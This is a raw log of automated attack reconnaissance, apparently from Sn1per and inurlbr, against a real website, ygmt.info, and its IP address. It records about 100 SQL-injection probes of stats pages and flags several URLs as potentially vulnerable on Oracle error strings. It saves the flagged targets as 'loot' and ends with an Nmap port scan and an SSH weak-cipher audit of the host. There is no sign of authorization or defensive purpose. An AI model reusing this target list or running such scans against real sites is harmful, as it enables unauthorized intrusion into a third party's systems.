16710|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=62 ]
16711|_[ + ] Exploit::
16712|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16713|_[ + ] More details:: / - / , ISP:
16714|_[ + ] Found:: UNIDENTIFIED
16715
16716 _[ - ]::--------------------------------------------------------------------------------------------------------------
16717|_[ + ] [ 41 / 100 ]-[00:27:45] [ - ]
16718|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=80 ]
16719|_[ + ] Exploit::
16720|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16721|_[ + ] More details:: / - / , ISP:
16722|_[ + ] Found:: UNIDENTIFIED
16723
16724 _[ - ]::--------------------------------------------------------------------------------------------------------------
16725|_[ + ] [ 42 / 100 ]-[00:27:46] [ - ]
16726|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=55 ]
16727|_[ + ] Exploit::
16728|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16729|_[ + ] More details:: / - / , ISP:
16730|_[ + ] Found:: UNIDENTIFIED
16731
16732 _[ - ]::--------------------------------------------------------------------------------------------------------------
16733|_[ + ] [ 43 / 100 ]-[00:27:47] [ - ]
16734|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=11 ]
16735|_[ + ] Exploit::
16736|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16737|_[ + ] More details:: / - / , ISP:
16738|_[ + ] Found:: UNIDENTIFIED
16739
16740 _[ - ]::--------------------------------------------------------------------------------------------------------------
16741|_[ + ] [ 44 / 100 ]-[00:27:47] [ - ]
16742|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14 ]
16743|_[ + ] Exploit::
16744|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16745|_[ + ] More details:: / - / , ISP:
16746|_[ + ] Found:: UNIDENTIFIED
16747
16748 _[ - ]::--------------------------------------------------------------------------------------------------------------
16749|_[ + ] [ 45 / 100 ]-[00:27:48] [ - ]
16750|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19 ]
16751|_[ + ] Exploit::
16752|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16753|_[ + ] More details:: / - / , ISP:
16754|_[ + ] Found:: UNIDENTIFIED
16755
16756 _[ - ]::--------------------------------------------------------------------------------------------------------------
16757|_[ + ] [ 46 / 100 ]-[00:27:49] [ - ]
16758|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=98 ]
16759|_[ + ] Exploit::
16760|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16761|_[ + ] More details:: / - / , ISP:
16762|_[ + ] Found:: UNIDENTIFIED
16763
16764 _[ - ]::--------------------------------------------------------------------------------------------------------------
16765|_[ + ] [ 47 / 100 ]-[00:27:50] [ - ]
16766|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=82 ]
16767|_[ + ] Exploit::
16768|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16769|_[ + ] More details:: / - / , ISP:
16770|_[ + ] Found:: UNIDENTIFIED
16771
16772 _[ - ]::--------------------------------------------------------------------------------------------------------------
16773|_[ + ] [ 48 / 100 ]-[00:27:50] [ - ]
16774|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=74 ]
16775|_[ + ] Exploit::
16776|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16777|_[ + ] More details:: / - / , ISP:
16778|_[ + ] Found:: UNIDENTIFIED
16779
16780 _[ - ]::--------------------------------------------------------------------------------------------------------------
16781|_[ + ] [ 49 / 100 ]-[00:27:51] [ - ]
16782|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100 ]
16783|_[ + ] Exploit::
16784|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16785|_[ + ] More details:: / - / , ISP:
16786|_[ + ] Found:: UNIDENTIFIED
16787
16788 _[ - ]::--------------------------------------------------------------------------------------------------------------
16789|_[ + ] [ 50 / 100 ]-[00:27:52] [ - ]
16790|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25 ]
16791|_[ + ] Exploit::
16792|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16793|_[ + ] More details:: / - / , ISP:
16794|_[ + ] Found:: UNIDENTIFIED
16795
16796 _[ - ]::--------------------------------------------------------------------------------------------------------------
16797|_[ + ] [ 51 / 100 ]-[00:27:52] [ - ]
16798|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=augustagrenier ]
16799|_[ + ] Exploit::
16800|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16801|_[ + ] More details:: / - / , ISP:
16802|_[ + ] Found:: UNIDENTIFIED
16803
16804 _[ - ]::--------------------------------------------------------------------------------------------------------------
16805|_[ + ] [ 52 / 100 ]-[00:27:53] [ ! ]
16806|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=56 ]
16807|_[ + ] Exploit::
16808|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16809|_[ + ] More details:: / - / , ISP:
16810|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16811|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16812
16813 _[ - ]::--------------------------------------------------------------------------------------------------------------
16814|_[ + ] [ 53 / 100 ]-[00:27:54] [ - ]
16815|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=17 ]
16816|_[ + ] Exploit::
16817|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16818|_[ + ] More details:: / - / , ISP:
16819|_[ + ] Found:: UNIDENTIFIED
16820
16821 _[ - ]::--------------------------------------------------------------------------------------------------------------
16822|_[ + ] [ 54 / 100 ]-[00:27:55] [ - ]
16823|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=26 ]
16824|_[ + ] Exploit::
16825|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16826|_[ + ] More details:: / - / , ISP:
16827|_[ + ] Found:: UNIDENTIFIED
16828
16829 _[ - ]::--------------------------------------------------------------------------------------------------------------
16830|_[ + ] [ 55 / 100 ]-[00:27:56] [ - ]
16831|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=44 ]
16832|_[ + ] Exploit::
16833|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16834|_[ + ] More details:: / - / , ISP:
16835|_[ + ] Found:: UNIDENTIFIED
16836
16837 _[ - ]::--------------------------------------------------------------------------------------------------------------
16838|_[ + ] [ 56 / 100 ]-[00:27:57] [ - ]
16839|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=60 ]
16840|_[ + ] Exploit::
16841|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16842|_[ + ] More details:: / - / , ISP:
16843|_[ + ] Found:: UNIDENTIFIED
16844
16845 _[ - ]::--------------------------------------------------------------------------------------------------------------
16846|_[ + ] [ 57 / 100 ]-[00:27:58] [ - ]
16847|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=45 ]
16848|_[ + ] Exploit::
16849|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16850|_[ + ] More details:: / - / , ISP:
16851|_[ + ] Found:: UNIDENTIFIED
16852
16853 _[ - ]::--------------------------------------------------------------------------------------------------------------
16854|_[ + ] [ 58 / 100 ]-[00:27:58] [ - ]
16855|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=16 ]
16856|_[ + ] Exploit::
16857|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16858|_[ + ] More details:: / - / , ISP:
16859|_[ + ] Found:: UNIDENTIFIED
16860
16861 _[ - ]::--------------------------------------------------------------------------------------------------------------
16862|_[ + ] [ 59 / 100 ]-[00:28:00] [ - ]
16863|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23 ]
16864|_[ + ] Exploit::
16865|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16866|_[ + ] More details:: / - / , ISP:
16867|_[ + ] Found:: UNIDENTIFIED
16868
16869 _[ - ]::--------------------------------------------------------------------------------------------------------------
16870|_[ + ] [ 60 / 100 ]-[00:28:02] [ - ]
16871|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20 ]
16872|_[ + ] Exploit::
16873|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16874|_[ + ] More details:: / - / , ISP:
16875|_[ + ] Found:: UNIDENTIFIED
16876
16877 _[ - ]::--------------------------------------------------------------------------------------------------------------
16878|_[ + ] [ 61 / 100 ]-[00:28:03] [ - ]
16879|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=106 ]
16880|_[ + ] Exploit::
16881|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16882|_[ + ] More details:: / - / , ISP:
16883|_[ + ] Found:: UNIDENTIFIED
16884
16885 _[ - ]::--------------------------------------------------------------------------------------------------------------
16886|_[ + ] [ 62 / 100 ]-[00:28:04] [ ! ]
16887|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=28 ]
16888|_[ + ] Exploit::
16889|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16890|_[ + ] More details:: / - / , ISP:
16891|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16892|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16893
16894 _[ - ]::--------------------------------------------------------------------------------------------------------------
16895|_[ + ] [ 63 / 100 ]-[00:28:05] [ - ]
16896|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=34 ]
16897|_[ + ] Exploit::
16898|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16899|_[ + ] More details:: / - / , ISP:
16900|_[ + ] Found:: UNIDENTIFIED
16901
16902 _[ - ]::--------------------------------------------------------------------------------------------------------------
16903|_[ + ] [ 64 / 100 ]-[00:28:05] [ - ]
16904|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=9 ]
16905|_[ + ] Exploit::
16906|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16907|_[ + ] More details:: / - / , ISP:
16908|_[ + ] Found:: UNIDENTIFIED
16909
16910 _[ - ]::--------------------------------------------------------------------------------------------------------------
16911|_[ + ] [ 65 / 100 ]-[00:28:06] [ - ]
16912|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59 ]
16913|_[ + ] Exploit::
16914|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16915|_[ + ] More details:: / - / , ISP:
16916|_[ + ] Found:: UNIDENTIFIED
16917
16918 _[ - ]::--------------------------------------------------------------------------------------------------------------
16919|_[ + ] [ 66 / 100 ]-[00:28:07] [ - ]
16920|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=62 ]
16921|_[ + ] Exploit::
16922|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16923|_[ + ] More details:: / - / , ISP:
16924|_[ + ] Found:: UNIDENTIFIED
16925
16926 _[ - ]::--------------------------------------------------------------------------------------------------------------
16927|_[ + ] [ 67 / 100 ]-[00:28:08] [ - ]
16928|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=77 ]
16929|_[ + ] Exploit::
16930|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16931|_[ + ] More details:: / - / , ISP:
16932|_[ + ] Found:: UNIDENTIFIED
16933
16934 _[ - ]::--------------------------------------------------------------------------------------------------------------
16935|_[ + ] [ 68 / 100 ]-[00:28:09] [ - ]
16936|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47 ]
16937|_[ + ] Exploit::
16938|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16939|_[ + ] More details:: / - / , ISP:
16940|_[ + ] Found:: UNIDENTIFIED
16941
16942 _[ - ]::--------------------------------------------------------------------------------------------------------------
16943|_[ + ] [ 69 / 100 ]-[00:28:09] [ - ]
16944|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=4 ]
16945|_[ + ] Exploit::
16946|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16947|_[ + ] More details:: / - / , ISP:
16948|_[ + ] Found:: UNIDENTIFIED
16949
16950 _[ - ]::--------------------------------------------------------------------------------------------------------------
16951|_[ + ] [ 70 / 100 ]-[00:28:10] [ - ]
16952|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=52 ]
16953|_[ + ] Exploit::
16954|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16955|_[ + ] More details:: / - / , ISP:
16956|_[ + ] Found:: UNIDENTIFIED
16957
16958 _[ - ]::--------------------------------------------------------------------------------------------------------------
16959|_[ + ] [ 71 / 100 ]-[00:28:11] [ - ]
16960|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=65&go=1 ]
16961|_[ + ] Exploit::
16962|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16963|_[ + ] More details:: / - / , ISP:
16964|_[ + ] Found:: UNIDENTIFIED
16965
16966 _[ - ]::--------------------------------------------------------------------------------------------------------------
16967|_[ + ] [ 72 / 100 ]-[00:28:12] [ - ]
16968|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100&all_reviews=1 ]
16969|_[ + ] Exploit::
16970|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16971|_[ + ] More details:: / - / , ISP:
16972|_[ + ] Found:: UNIDENTIFIED
16973
16974 _[ - ]::--------------------------------------------------------------------------------------------------------------
16975|_[ + ] [ 73 / 100 ]-[00:28:12] [ - ]
16976|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=39&go=1 ]
16977|_[ + ] Exploit::
16978|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16979|_[ + ] More details:: / - / , ISP:
16980|_[ + ] Found:: UNIDENTIFIED
16981
16982 _[ - ]::--------------------------------------------------------------------------------------------------------------
16983|_[ + ] [ 74 / 100 ]-[00:28:13] [ - ]
16984|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=57&all_reviews=1 ]
16985|_[ + ] Exploit::
16986|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16987|_[ + ] More details:: / - / , ISP:
16988|_[ + ] Found:: UNIDENTIFIED
16989
16990 _[ - ]::--------------------------------------------------------------------------------------------------------------
16991|_[ + ] [ 75 / 100 ]-[00:28:14] [ - ]
16992|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=104&all_reviews=1 ]
16993|_[ + ] Exploit::
16994|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16995|_[ + ] More details:: / - / , ISP:
16996|_[ + ] Found:: UNIDENTIFIED
16997
16998 _[ - ]::--------------------------------------------------------------------------------------------------------------
16999|_[ + ] [ 76 / 100 ]-[00:28:15] [ - ]
17000|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25&all_reviews=1 ]
17001|_[ + ] Exploit::
17002|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17003|_[ + ] More details:: / - / , ISP:
17004|_[ + ] Found:: UNIDENTIFIED
17005
17006 _[ - ]::--------------------------------------------------------------------------------------------------------------
17007|_[ + ] [ 77 / 100 ]-[00:28:16] [ - ]
17008|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23&all_reviews=1 ]
17009|_[ + ] Exploit::
17010|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17011|_[ + ] More details:: / - / , ISP:
17012|_[ + ] Found:: UNIDENTIFIED
17013
17014 _[ - ]::--------------------------------------------------------------------------------------------------------------
17015|_[ + ] [ 78 / 100 ]-[00:28:17] [ - ]
17016|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=8&all_reviews=1 ]
17017|_[ + ] Exploit::
17018|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17019|_[ + ] More details:: / - / , ISP:
17020|_[ + ] Found:: UNIDENTIFIED
17021
17022 _[ - ]::--------------------------------------------------------------------------------------------------------------
17023|_[ + ] [ 79 / 100 ]-[00:28:17] [ - ]
17024|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1&all_reviews=1 ]
17025|_[ + ] Exploit::
17026|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17027|_[ + ] More details:: / - / , ISP:
17028|_[ + ] Found:: UNIDENTIFIED
17029
17030 _[ - ]::--------------------------------------------------------------------------------------------------------------
17031|_[ + ] [ 80 / 100 ]-[00:28:18] [ - ]
17032|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43&all_reviews=1 ]
17033|_[ + ] Exploit::
17034|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17035|_[ + ] More details:: / - / , ISP:
17036|_[ + ] Found:: UNIDENTIFIED
17037
17038 _[ - ]::--------------------------------------------------------------------------------------------------------------
17039|_[ + ] [ 81 / 100 ]-[00:28:19] [ - ]
17040|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47&all_reviews=1 ]
17041|_[ + ] Exploit::
17042|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17043|_[ + ] More details:: / - / , ISP:
17044|_[ + ] Found:: UNIDENTIFIED
17045
17046 _[ - ]::--------------------------------------------------------------------------------------------------------------
17047|_[ + ] [ 82 / 100 ]-[00:28:19] [ - ]
17048|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=93&go=1 ]
17049|_[ + ] Exploit::
17050|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17051|_[ + ] More details:: / - / , ISP:
17052|_[ + ] Found:: UNIDENTIFIED
17053
17054 _[ - ]::--------------------------------------------------------------------------------------------------------------
17055|_[ + ] [ 83 / 100 ]-[00:28:20] [ - ]
17056|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=91&all_reviews=1 ]
17057|_[ + ] Exploit::
17058|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17059|_[ + ] More details:: / - / , ISP:
17060|_[ + ] Found:: UNIDENTIFIED
17061
17062 _[ - ]::--------------------------------------------------------------------------------------------------------------
17063|_[ + ] [ 84 / 100 ]-[00:28:21] [ - ]
17064|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93&all_reviews=1 ]
17065|_[ + ] Exploit::
17066|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17067|_[ + ] More details:: / - / , ISP:
17068|_[ + ] Found:: UNIDENTIFIED
17069
17070 _[ - ]::--------------------------------------------------------------------------------------------------------------
17071|_[ + ] [ 85 / 100 ]-[00:28:22] [ - ]
17072|_[ + ] Target:: [ https://www.ygmt.info/top/index.php?a=stats&u=99&all_reviews=1 ]
17073|_[ + ] Exploit::
17074|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:443
17075|_[ + ] More details:: / - / , ISP:
17076|_[ + ] Found:: UNIDENTIFIED
17077
17078 _[ - ]::--------------------------------------------------------------------------------------------------------------
17079|_[ + ] [ 86 / 100 ]-[00:28:23] [ - ]
17080|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66&all_reviews=1 ]
17081|_[ + ] Exploit::
17082|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17083|_[ + ] More details:: / - / , ISP:
17084|_[ + ] Found:: UNIDENTIFIED
17085
17086 _[ - ]::--------------------------------------------------------------------------------------------------------------
17087|_[ + ] [ 87 / 100 ]-[00:28:23] [ - ]
17088|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37&all_reviews=1 ]
17089|_[ + ] Exploit::
17090|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17091|_[ + ] More details:: / - / , ISP:
17092|_[ + ] Found:: UNIDENTIFIED
17093
17094 _[ - ]::--------------------------------------------------------------------------------------------------------------
17095|_[ + ] [ 88 / 100 ]-[00:28:24] [ - ]
17096|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19&all_reviews=1 ]
17097|_[ + ] Exploit::
17098|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17099|_[ + ] More details:: / - / , ISP:
17100|_[ + ] Found:: UNIDENTIFIED
17101
17102 _[ - ]::--------------------------------------------------------------------------------------------------------------
17103|_[ + ] [ 89 / 100 ]-[00:28:25] [ - ]
17104|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39&all_reviews=1 ]
17105|_[ + ] Exploit::
17106|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17107|_[ + ] More details:: / - / , ISP:
17108|_[ + ] Found:: UNIDENTIFIED
17109
17110 _[ - ]::--------------------------------------------------------------------------------------------------------------
17111|_[ + ] [ 90 / 100 ]-[00:28:26] [ - ]
17112|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30&all_reviews=1 ]
17113|_[ + ] Exploit::
17114|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17115|_[ + ] More details:: / - / , ISP:
17116|_[ + ] Found:: UNIDENTIFIED
17117
17118 _[ - ]::--------------------------------------------------------------------------------------------------------------
17119|_[ + ] [ 91 / 100 ]-[00:28:26] [ - ]
17120|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33&all_reviews=1 ]
17121|_[ + ] Exploit::
17122|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17123|_[ + ] More details:: / - / , ISP:
17124|_[ + ] Found:: UNIDENTIFIED
 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 92 / 100 ]-[00:28:27] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=44&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 93 / 100 ]-[00:28:28] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 94 / 100 ]-[00:28:29] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 95 / 100 ]-[00:28:30] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=42&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 96 / 100 ]-[00:28:31] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=61&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 97 / 100 ]-[00:28:32] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 98 / 100 ]-[00:28:32] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 99 / 100 ]-[00:28:33] [ - ]
|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75&all_reviews=1 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

[ INFO ] [ Shutting down ]
[ INFO ] [ End of process INURLBR at [06-10-2019 00:28:33]
[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 5 ]
[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
|_________________________________________________________________________________________
http://www.ygmt.info/top50/index.php?a=stats&u=107
http://www.ygmt.info/top50/index.php?a=stats&u=83
http://www.ygmt.info/top50/index.php?a=stats&u=34
http://www.ygmt.info/top50/index.php?a=stats&u=56
http://www.ygmt.info/top50/index.php?a=stats&u=28

\_________________________________________________________________________________________/
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:49 EDT
Nmap scan report for latina.petite.guru (185.82.200.52)
Host is up (0.12s latency).
Not shown: 479 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
10000/tcp open snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds
######################################################################################################################################
# general
(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
(gen) software: OpenSSH 6.7p1
(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
